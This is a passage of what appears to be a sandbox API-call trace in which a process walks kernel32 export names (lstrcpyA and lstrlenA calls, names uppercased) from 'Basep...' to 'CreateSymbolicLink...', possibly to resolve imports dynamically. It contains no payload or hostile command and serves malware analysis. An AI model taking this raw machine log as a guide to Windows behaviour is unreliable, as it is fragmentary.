lstrcpyA (in: lpString1=0x239e340, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.279] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.279] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.279] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.279] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.279] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.279] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.279] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.279] lstrlenA (lpString="BEEP") returned 4 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.279] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.279] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.280] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.280] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.280] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.280] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.280] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.280] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.280] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.280] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.280] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.280] lstrlenA (lpString="CANCELIO") returned 8 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.280] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.280] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.280] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.280] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.280] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.280] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.280] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.280] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.280] lstrcpyA (in: lpString1=0x239e340, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.281] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.281] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.281] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.281] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.281] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.281] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.281] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.281] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.281] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.281] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.281] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.281] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.281] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.281] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.281] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.281] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.281] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.281] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.281] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.281] lstrcpyA (in: lpString1=0x239e340, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.282] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.282] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.282] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.282] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.282] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.282] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.282] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.282] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.282] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.282] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.282] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.282] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.282] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.282] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.282] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.282] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.282] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.282] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.282] lstrcpyA (in: lpString1=0x239e340, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.282] lstrlenA (lpString="COPYFILEA") returned 9 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.283] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.283] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.283] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.283] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.283] lstrlenA (lpString="COPYFILEW") returned 9 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.283] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.283] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.283] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.283] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.283] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.283] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.283] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.283] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.283] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.283] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.283] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.283] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.283] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.283] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.283] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.284] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.284] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.284] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.284] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.284] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.284] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.284] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.284] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.284] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.284] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.284] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.284] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.284] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.284] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.284] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.284] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.284] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.284] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.284] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.285] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.285] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.285] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.285] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.285] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.285] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.285] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.285] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.285] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.285] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.285] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.285] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.285] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.285] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.285] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.285] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.285] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.285] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.285] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.286] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.286] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.286] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.286] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.286] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.286] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.286] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.286] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.286] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.286] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.286] lstrcpyA (in: lpString1=0x239e340, 